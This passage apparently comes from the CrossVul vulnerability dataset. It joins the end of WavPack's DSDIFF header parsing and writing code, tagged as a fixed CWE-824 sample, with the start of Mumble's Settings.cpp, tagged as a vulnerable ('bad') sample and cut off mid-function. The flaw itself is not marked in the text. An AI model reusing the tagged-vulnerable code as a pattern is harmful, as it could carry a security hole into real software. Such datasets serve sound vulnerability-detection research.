if (!strncmp (dff_chunk_header.ckID, "FVER", 4)) {
uint32_t version;
if (dff_chunk_header.ckDataSize != sizeof (version) ||
!DoReadFile (infile, &version, sizeof (version), &bcount) ||
bcount != sizeof (version)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &version, sizeof (version))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&version, "L");
if (debug_logging_mode)
error_line ("dsdiff file version = 0x%08x", version);
}
else if (!strncmp (dff_chunk_header.ckID, "PROP", 4)) {
char *prop_chunk;
if (dff_chunk_header.ckDataSize < 4 || dff_chunk_header.ckDataSize > 1024) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("got PROP chunk of %d bytes total", (int) dff_chunk_header.ckDataSize);
prop_chunk = malloc ((size_t) dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize, &bcount) ||
bcount != dff_chunk_header.ckDataSize) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize)) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
if (!strncmp (prop_chunk, "SND ", 4)) {
char *cptr = prop_chunk + 4, *eptr = prop_chunk + dff_chunk_header.ckDataSize;
uint16_t numChannels = 0, chansSpecified, chanMask = 0;
uint32_t sampleRate = 0;
while (eptr - cptr >= sizeof (dff_chunk_header)) {
memcpy (&dff_chunk_header, cptr, sizeof (dff_chunk_header));
cptr += sizeof (dff_chunk_header);
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (dff_chunk_header.ckDataSize > 0 && dff_chunk_header.ckDataSize <= eptr - cptr) {
if (!strncmp (dff_chunk_header.ckID, "FS ", 4) && dff_chunk_header.ckDataSize == 4) {
memcpy (&sampleRate, cptr, sizeof (sampleRate));
WavpackBigEndianToNative (&sampleRate, "L");
cptr += dff_chunk_header.ckDataSize;
if (debug_logging_mode)
error_line ("got sample rate of %u Hz", sampleRate);
}
else if (!strncmp (dff_chunk_header.ckID, "CHNL", 4) && dff_chunk_header.ckDataSize >= 2) {
memcpy (&numChannels, cptr, sizeof (numChannels));
WavpackBigEndianToNative (&numChannels, "S");
cptr += sizeof (numChannels);
chansSpecified = (int)(dff_chunk_header.ckDataSize - sizeof (numChannels)) / 4;
if (numChannels < chansSpecified || numChannels < 1 || numChannels > 256) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
while (chansSpecified--) {
if (!strncmp (cptr, "SLFT", 4) || !strncmp (cptr, "MLFT", 4))
chanMask |= 0x1;
else if (!strncmp (cptr, "SRGT", 4) || !strncmp (cptr, "MRGT", 4))
chanMask |= 0x2;
else if (!strncmp (cptr, "LS ", 4))
chanMask |= 0x10;
else if (!strncmp (cptr, "RS ", 4))
chanMask |= 0x20;
else if (!strncmp (cptr, "C ", 4))
chanMask |= 0x4;
else if (!strncmp (cptr, "LFE ", 4))
chanMask |= 0x8;
else
if (debug_logging_mode)
error_line ("undefined channel ID %c%c%c%c", cptr [0], cptr [1], cptr [2], cptr [3]);
cptr += 4;
}
if (debug_logging_mode)
error_line ("%d channels, mask = 0x%08x", numChannels, chanMask);
}
else if (!strncmp (dff_chunk_header.ckID, "CMPR", 4) && dff_chunk_header.ckDataSize >= 4) {
if (strncmp (cptr, "DSD ", 4)) {
error_line ("DSDIFF files must be uncompressed, not \"%c%c%c%c\"!",
cptr [0], cptr [1], cptr [2], cptr [3]);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
cptr += dff_chunk_header.ckDataSize;
}
else {
if (debug_logging_mode)
error_line ("got PROP/SND chunk type \"%c%c%c%c\" of %d bytes", dff_chunk_header.ckID [0],
dff_chunk_header.ckID [1], dff_chunk_header.ckID [2], dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
cptr += dff_chunk_header.ckDataSize;
}
}
else {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
}
if (chanMask && (config->channel_mask || (config->qmode & QMODE_CHANS_UNASSIGNED))) {
error_line ("this DSDIFF file already has channel order information!");
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (chanMask)
config->channel_mask = chanMask;
config->bits_per_sample = 8;
config->bytes_per_sample = 1;
config->num_channels = numChannels;
config->sample_rate = sampleRate / 8;
config->qmode |= QMODE_DSD_MSB_FIRST;
}
else if (debug_logging_mode)
error_line ("got unknown PROP chunk type \"%c%c%c%c\" of %d bytes",
prop_chunk [0], prop_chunk [1], prop_chunk [2], prop_chunk [3], dff_chunk_header.ckDataSize);
free (prop_chunk);
}
else if (!strncmp (dff_chunk_header.ckID, "DSD ", 4)) {
if (!config->num_channels || !config->sample_rate) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
total_samples = dff_chunk_header.ckDataSize / config->num_channels;
break;
}
else { // just copy unknown chunks to output file
int bytes_to_copy = (int)(((dff_chunk_header.ckDataSize) + 1) & ~(int64_t)1);
char *buff;
if (bytes_to_copy < 0 || bytes_to_copy > 4194304) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
buff = malloc (bytes_to_copy);
if (debug_logging_mode)
error_line ("extra unknown chunk \"%c%c%c%c\" of %d bytes",
dff_chunk_header.ckID [0], dff_chunk_header.ckID [1], dff_chunk_header.ckID [2],
dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, buff, bytes_to_copy, &bcount) ||
bcount != bytes_to_copy ||
(!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, buff, bytes_to_copy))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (buff);
return WAVPACK_SOFT_ERROR;
}
free (buff);
}
}
if (debug_logging_mode)
error_line ("setting configuration with %lld samples", total_samples);
if (!WavpackSetConfiguration64 (wpc, config, total_samples, NULL)) {
error_line ("%s: %s", infilename, WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
return WAVPACK_NO_ERROR;
}
int WriteDsdiffHeader (FILE *outfile, WavpackContext *wpc, int64_t total_samples, int qmode)
{
uint32_t chan_mask = WavpackGetChannelMask (wpc);
int num_channels = WavpackGetNumChannels (wpc);
DFFFileHeader file_header, prop_header;
DFFChunkHeader data_header;
DFFVersionChunk ver_chunk;
DFFSampleRateChunk fs_chunk;
DFFChannelsHeader chan_header;
DFFCompressionHeader cmpr_header;
char *cmpr_name = "\016not compressed", *chan_ids;
int64_t file_size, prop_chunk_size, data_size;
int cmpr_name_size, chan_ids_size;
uint32_t bcount;
if (debug_logging_mode)
error_line ("WriteDsdiffHeader (), total samples = %lld, qmode = 0x%02x\n",
(long long) total_samples, qmode);
cmpr_name_size = (strlen (cmpr_name) + 1) & ~1;
chan_ids_size = num_channels * 4;
chan_ids = malloc (chan_ids_size);
if (chan_ids) {
uint32_t scan_mask = 0x1;
char *cptr = chan_ids;
int ci, uci = 0;
for (ci = 0; ci < num_channels; ++ci) {
while (scan_mask && !(scan_mask & chan_mask))
scan_mask <<= 1;
if (scan_mask & 0x1)
memcpy (cptr, num_channels <= 2 ? "SLFT" : "MLFT", 4);
else if (scan_mask & 0x2)
memcpy (cptr, num_channels <= 2 ? "SRGT" : "MRGT", 4);
else if (scan_mask & 0x4)
memcpy (cptr, "C ", 4);
else if (scan_mask & 0x8)
memcpy (cptr, "LFE ", 4);
else if (scan_mask & 0x10)
memcpy (cptr, "LS ", 4);
else if (scan_mask & 0x20)
memcpy (cptr, "RS ", 4);
else {
cptr [0] = 'C';
cptr [1] = (uci / 100) + '0';
cptr [2] = ((uci % 100) / 10) + '0';
cptr [3] = (uci % 10) + '0';
uci++;
}
scan_mask <<= 1;
cptr += 4;
}
}
else {
error_line ("can't allocate memory!");
return FALSE;
}
data_size = total_samples * num_channels;
prop_chunk_size = sizeof (prop_header) + sizeof (fs_chunk) + sizeof (chan_header) + chan_ids_size + sizeof (cmpr_header) + cmpr_name_size;
file_size = sizeof (file_header) + sizeof (ver_chunk) + prop_chunk_size + sizeof (data_header) + ((data_size + 1) & ~(int64_t)1);
memcpy (file_header.ckID, "FRM8", 4);
file_header.ckDataSize = file_size - 12;
memcpy (file_header.formType, "DSD ", 4);
memcpy (prop_header.ckID, "PROP", 4);
prop_header.ckDataSize = prop_chunk_size - 12;
memcpy (prop_header.formType, "SND ", 4);
memcpy (ver_chunk.ckID, "FVER", 4);
ver_chunk.ckDataSize = sizeof (ver_chunk) - 12;
ver_chunk.version = 0x01050000;
memcpy (fs_chunk.ckID, "FS ", 4);
fs_chunk.ckDataSize = sizeof (fs_chunk) - 12;
fs_chunk.sampleRate = WavpackGetSampleRate (wpc) * 8;
memcpy (chan_header.ckID, "CHNL", 4);
chan_header.ckDataSize = sizeof (chan_header) + chan_ids_size - 12;
chan_header.numChannels = num_channels;
memcpy (cmpr_header.ckID, "CMPR", 4);
cmpr_header.ckDataSize = sizeof (cmpr_header) + cmpr_name_size - 12;
memcpy (cmpr_header.compressionType, "DSD ", 4);
memcpy (data_header.ckID, "DSD ", 4);
data_header.ckDataSize = data_size;
WavpackNativeToBigEndian (&file_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&ver_chunk, DFFVersionChunkFormat);
WavpackNativeToBigEndian (&prop_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&fs_chunk, DFFSampleRateChunkFormat);
WavpackNativeToBigEndian (&chan_header, DFFChannelsHeaderFormat);
WavpackNativeToBigEndian (&cmpr_header, DFFCompressionHeaderFormat);
WavpackNativeToBigEndian (&data_header, DFFChunkHeaderFormat);
if (!DoWriteFile (outfile, &file_header, sizeof (file_header), &bcount) || bcount != sizeof (file_header) ||
!DoWriteFile (outfile, &ver_chunk, sizeof (ver_chunk), &bcount) || bcount != sizeof (ver_chunk) ||
!DoWriteFile (outfile, &prop_header, sizeof (prop_header), &bcount) || bcount != sizeof (prop_header) ||
!DoWriteFile (outfile, &fs_chunk, sizeof (fs_chunk), &bcount) || bcount != sizeof (fs_chunk) ||
!DoWriteFile (outfile, &chan_header, sizeof (chan_header), &bcount) || bcount != sizeof (chan_header) ||
!DoWriteFile (outfile, chan_ids, chan_ids_size, &bcount) || bcount != chan_ids_size ||
!DoWriteFile (outfile, &cmpr_header, sizeof (cmpr_header), &bcount) || bcount != sizeof (cmpr_header) ||
!DoWriteFile (outfile, cmpr_name, cmpr_name_size, &bcount) || bcount != cmpr_name_size ||
!DoWriteFile (outfile, &data_header, sizeof (data_header), &bcount) || bcount != sizeof (data_header)) {
error_line ("can't write .DSF data, disk probably full!");
free (chan_ids);
return FALSE;
}
free (chan_ids);
return TRUE;
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_824_0 |
crossvul-cpp_data_bad_3579_1 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
Copyright (C) 2009-2011, Stefan Hacker <dd0t@users.sourceforge.net>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Settings.h"
#include "Log.h"
#include "Global.h"
#include "AudioInput.h"
#include "Cert.h"
#include "../../overlay/overlay.h"
#include "../../overlay/overlay_blacklist.h"
bool Shortcut::isServerSpecific() const {
if (qvData.canConvert<ShortcutTarget>()) {
const ShortcutTarget &sc = qvariant_cast<ShortcutTarget> (qvData);
return sc.isServerSpecific();
}
return false;
}
bool Shortcut::operator < (const Shortcut &other) const {
return (iIndex < other.iIndex);
}
bool Shortcut::operator == (const Shortcut &other) const {
return (iIndex == other.iIndex) && (qlButtons == other.qlButtons) && (qvData == other.qvData) && (bSuppress == other.bSuppress);
}
ShortcutTarget::ShortcutTarget() {
bUsers = true;
iChannel = -3;
bLinks = bChildren = bForceCenter = false;
}
bool ShortcutTarget::isServerSpecific() const {
return (! bUsers && (iChannel >= 0));
}
bool ShortcutTarget::operator == (const ShortcutTarget &o) const {
if ((bUsers != o.bUsers) || (bForceCenter != o.bForceCenter))
return false;
if (bUsers)
return (qlUsers == o.qlUsers) && (qlSessions == o.qlSessions);
else
return (iChannel == o.iChannel) && (bLinks == o.bLinks) && (bChildren == o.bChildren) && (qsGroup == o.qsGroup);
}
quint32 qHash(const ShortcutTarget &t) {
quint32 h = t.bForceCenter ? 0x55555555 : 0xaaaaaaaa;
if (t.bUsers) {
foreach(unsigned int u, t.qlSessions)
h ^= u;
} else {
h ^= t.iChannel;
if (t.bLinks)
h ^= 0x80000000;
if (t.bChildren)
h ^= 0x40000000;
h ^= qHash(t.qsGroup);
h = ~h;
}
return h;
}
quint32 qHash(const QList<ShortcutTarget> &l) {
quint32 h = l.count();
foreach(const ShortcutTarget &st, l)
h ^= qHash(st);
return h;
}
QDataStream &operator<< (QDataStream &qds, const ShortcutTarget &st) {
qds << st.bUsers << st.bForceCenter;
if (st.bUsers)
return qds << st.qlUsers;
else
return qds << st.iChannel << st.qsGroup << st.bLinks << st.bChildren;
}
QDataStream &operator>> (QDataStream &qds, ShortcutTarget &st) {
qds >> st.bUsers >> st.bForceCenter;
if (st.bUsers)
return qds >> st.qlUsers;
else
return qds >> st.iChannel >> st.qsGroup >> st.bLinks >> st.bChildren;
}
const QString Settings::cqsDefaultPushClickOn = QLatin1String(":/on.ogg");
const QString Settings::cqsDefaultPushClickOff = QLatin1String(":/off.ogg");
OverlaySettings::OverlaySettings() {
bEnable = true;
fX = 1.0f;
fY = 0.0f;
fZoom = 0.875f;
#ifdef Q_OS_MAC
qsStyle = QLatin1String("Cleanlooks");
#endif
osShow = LinkedChannels;
bAlwaysSelf = true;
uiActiveTime = 5;
osSort = Alphabetical;
qcUserName[Settings::Passive] = QColor(170, 170, 170);
qcUserName[Settings::Talking] = QColor(255, 255, 255);
qcUserName[Settings::Whispering] = QColor(128, 255, 128);
qcUserName[Settings::Shouting] = QColor(255, 128, 255);
qcChannel = QColor(255, 255, 128);
qcBoxPen = QColor(0, 0, 0, 224);
qcBoxFill = QColor(0, 0, 0);
setPreset();
// FPS display settings
qcFps = Qt::white;
fFps = 0.75f;
qfFps = qfUserName;
qrfFps = QRectF(10, 10, -1, 0.023438f);
bFps = false;
bUseWhitelist = false;
#ifdef Q_OS_WIN
int i = 0;
while (overlayBlacklist[i]) {
qslBlacklist << QLatin1String(overlayBlacklist[i]);
i++;
}
#endif
}
void OverlaySettings::setPreset(const OverlayPresets preset) {
switch (preset) {
case LargeSquareAvatar:
uiColumns = 2;
fUserName = 0.75f;
fChannel = 0.75f;
fMutedDeafened = 0.5f;
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(-0.0625f, 0.101563f - 0.0625f, 0.125f, 0.023438f);
qrfChannel = QRectF(-0.03125f, -0.0625f, 0.09375f, 0.015625f);
qrfMutedDeafened = QRectF(-0.0625f, -0.0625f, 0.0625f, 0.0625f);
qrfAvatar = QRectF(-0.0625f, -0.0625f, 0.125f, 0.125f);
fBoxPenWidth = (1.f / 256.0f);
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = true;
bMutedDeafened = true;
bAvatar = true;
bBox = false;
qaUserName = Qt::AlignCenter;
qaMutedDeafened = Qt::AlignLeft | Qt::AlignTop;
qaAvatar = Qt::AlignCenter;
qaChannel = Qt::AlignCenter;
break;
case AvatarAndName:
default:
uiColumns = 1;
fUserName = 1.0f;
fChannel = (7.0f / 8.0f);
fMutedDeafened = (7.0f / 8.0f);
fAvatar = 1.0f;
#if defined(Q_OS_WIN) || defined(Q_OS_MAC)
qfUserName = QFont(QLatin1String("Verdana"), 20);
#else
qfUserName = QFont(QLatin1String("Arial"), 20);
#endif
qfChannel = qfUserName;
fUser[Settings::Passive] = 0.5f;
fUser[Settings::Talking] = (7.0f / 8.0f);
fUser[Settings::Whispering] = (7.0f / 8.0f);
fUser[Settings::Shouting] = (7.0f / 8.0f);
qrfUserName = QRectF(0.015625f, -0.015625f, 0.250f, 0.03125f);
qrfChannel = QRectF(0.03125f, -0.015625f, 0.1875f, 0.015625f);
qrfMutedDeafened = QRectF(0.234375f, -0.015625f, 0.03125f, 0.03125f);
qrfAvatar = QRectF(-0.03125f, -0.015625f, 0.03125f, 0.03125f);
fBoxPenWidth = 0.0f;
fBoxPad = (1.f / 256.0f);
bUserName = true;
bChannel = false;
bMutedDeafened = true;
bAvatar = true;
bBox = true;
qaUserName = Qt::AlignLeft | Qt::AlignVCenter;
qaMutedDeafened = Qt::AlignRight | Qt::AlignVCenter;
qaAvatar = Qt::AlignRight | Qt::AlignVCenter;
qaChannel = Qt::AlignLeft | Qt::AlignTop;
break;
}
}
Settings::Settings() {
qRegisterMetaType<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaTypeStreamOperators<ShortcutTarget> ("ShortcutTarget");
qRegisterMetaType<QVariant> ("QVariant");
atTransmit = VAD;
bTransmitPosition = false;
bMute = bDeaf = false;
bTTS = true;
bTTSMessageReadBack = false;
iTTSVolume = 75;
iTTSThreshold = 250;
iQuality = 40000;
fVolume = 1.0f;
fOtherVolume = 0.5f;
bAttenuateOthersOnTalk = false;
bAttenuateOthers = true;
iMinLoudness = 1000;
iVoiceHold = 50;
iJitterBufferSize = 1;
iFramesPerPacket = 2;
iNoiseSuppress = -30;
iIdleTime = 0;
vsVAD = Amplitude;
fVADmin = 0.80f;
fVADmax = 0.98f;
bTxAudioCue = false;
qsTxAudioCueOn = cqsDefaultPushClickOn;
qsTxAudioCueOff = cqsDefaultPushClickOff;
bUserTop = false;
bWhisperFriends = false;
uiDoublePush = 0;
bExpert = false;
#ifdef NO_UPDATE_CHECK
bUpdateCheck = false;
bPluginOverlayCheck = false;
#else
bUpdateCheck = true;
bPluginOverlayCheck = true;
#endif
qsImagePath = QDesktopServices::storageLocation(QDesktopServices::PicturesLocation);
ceExpand = ChannelsWithUsers;
ceChannelDrag = Ask;
bMinimalView = false;
bHideFrame = false;
aotbAlwaysOnTop = OnTopNever;
bAskOnQuit = true;
#ifdef Q_OS_WIN
// Don't enable minimize to tray by default on win7
bHideInTray = (QSysInfo::windowsVersion() != QSysInfo::WV_6_1);
#else
bHideInTray = true;
#endif
bStateInTray = true;
bUsage = true;
bShowUserCount = false;
wlWindowLayout = LayoutClassic;
bShowContextMenuInMenuBar = false;
ssFilter = ShowReachable;
iOutputDelay = 5;
qsALSAInput=QLatin1String("default");
qsALSAOutput=QLatin1String("default");
bEcho = false;
bEchoMulti = true;
bExclusiveInput = false;
bExclusiveOutput = false;
iPortAudioInput = -1; // default device
iPortAudioOutput = -1; // default device
bPositionalAudio = true;
bPositionalHeadphone = false;
fAudioMinDistance = 1.0f;
fAudioMaxDistance = 15.0f;
fAudioMaxDistVolume = 0.80f;
fAudioBloom = 0.5f;
iLCDUserViewMinColWidth = 50;
iLCDUserViewSplitterWidth = 2;
// PTT Button window
bShowPTTButtonWindow = false;
// Network settings
bTCPCompat = false;
bQoS = true;
bReconnect = true;
bAutoConnect = false;
ptProxyType = NoProxy;
usProxyPort = 0;
iMaxImageSize = ciDefaultMaxImageSize;
iMaxImageWidth = 1024; // Allow 1024x1024 resolution
iMaxImageHeight = 1024;
bSuppressIdentity = false;
// Accessibility
bHighContrast = false;
// Recording
qsRecordingPath = QDesktopServices::storageLocation(QDesktopServices::DocumentsLocation);
qsRecordingFile = QLatin1String("Mumble-%date-%time-%host-%user");
rmRecordingMode = RecordingMixdown;
iRecordingFormat = 0;
// Config updates
uiUpdateCounter = 0;
#if defined(AUDIO_TEST)
lmLoopMode = Server;
#else
lmLoopMode = None;
#endif
dPacketLoss = 0;
dMaxPacketDelay = 0.0f;
iMaxLogBlocks = 0;
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessages.insert(i, Settings::LogConsole | Settings::LogBalloon | Settings::LogTTS);
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessageSounds.insert(i, QString());
qmMessageSounds[Log::CriticalError] = QLatin1String(":/Critical.ogg");
qmMessageSounds[Log::PermissionDenied] = QLatin1String(":/PermissionDenied.ogg");
qmMessageSounds[Log::SelfMute] = QLatin1String(":/SelfMutedDeafened.ogg");
qmMessageSounds[Log::ServerConnected] = QLatin1String(":/ServerConnected.ogg");
qmMessageSounds[Log::ServerDisconnected] = QLatin1String(":/ServerDisconnected.ogg");
qmMessageSounds[Log::TextMessage] = QLatin1String(":/TextMessage.ogg");
qmMessageSounds[Log::ChannelJoin] = QLatin1String(":/UserJoinedChannel.ogg");
qmMessageSounds[Log::ChannelLeave] = QLatin1String(":/UserLeftChannel.ogg");
qmMessageSounds[Log::YouMutedOther] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouMuted] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouKicked] = QLatin1String(":/UserKickedYouOrByYou.ogg");
qmMessageSounds[Log::Recording] = QLatin1String(":/RecordingStateChanged.ogg");
qmMessages[Log::DebugInfo] = Settings::LogConsole;
qmMessages[Log::Warning] = Settings::LogConsole | Settings::LogBalloon;
qmMessages[Log::Information] = Settings::LogConsole;
qmMessages[Log::UserJoin] = Settings::LogConsole;
qmMessages[Log::UserLeave] = Settings::LogConsole;
qmMessages[Log::UserKicked] = Settings::LogConsole;
qmMessages[Log::OtherSelfMute] = Settings::LogConsole;
qmMessages[Log::OtherMutedOther] = Settings::LogConsole;
}
bool Settings::doEcho() const {
if (! bEcho)
return false;
if (AudioInputRegistrar::qmNew) {
AudioInputRegistrar *air = AudioInputRegistrar::qmNew->value(qsAudioInput);
if (air) {
if (air->canEcho(qsAudioOutput))
return true;
}
}
return false;
}
bool Settings::doPositionalAudio() const {
return bPositionalAudio;
}
#include BOOST_TYPEOF_INCREMENT_REGISTRATION_GROUP()
BOOST_TYPEOF_REGISTER_TYPE(Qt::Alignment)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AudioTransmit)
BOOST_TYPEOF_REGISTER_TYPE(Settings::VADSource)
BOOST_TYPEOF_REGISTER_TYPE(Settings::LoopMode)
BOOST_TYPEOF_REGISTER_TYPE(Settings::OverlayShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ProxyType)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelExpand)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelDrag)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ServerShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::WindowLayout)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AlwaysOnTopBehaviour)
BOOST_TYPEOF_REGISTER_TYPE(Settings::RecordingMode)
BOOST_TYPEOF_REGISTER_TYPE(QString)
BOOST_TYPEOF_REGISTER_TYPE(QByteArray)
BOOST_TYPEOF_REGISTER_TYPE(QColor)
BOOST_TYPEOF_REGISTER_TYPE(QVariant)
BOOST_TYPEOF_REGISTER_TYPE(QFont)
BOOST_TYPEOF_REGISTER_TEMPLATE(QList, 1)
#define SAVELOAD(var,name) var = qvariant_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var))
#define LOADENUM(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var).toInt())
#define LOADFLAG(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), static_cast<int>(var)).toInt())
void OverlaySettings::load() {
load(g.qs);
}
void OverlaySettings::load(QSettings* settings_ptr) {
SAVELOAD(bEnable, "enable");
LOADENUM(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
LOADENUM(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
LOADFLAG(qaUserName, "useralign");
LOADFLAG(qaChannel, "channelalign");
LOADFLAG(qaMutedDeafened, "mutedalign");
LOADFLAG(qaAvatar, "avataralign");
SAVELOAD(bUseWhitelist, "usewhitelist");
SAVELOAD(qslBlacklist, "blacklist");
SAVELOAD(qslWhitelist, "whitelist");
}
void Settings::load() {
load(g.qs);
}
void Settings::load(QSettings* settings_ptr) {
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
LOADENUM(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
LOADENUM(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
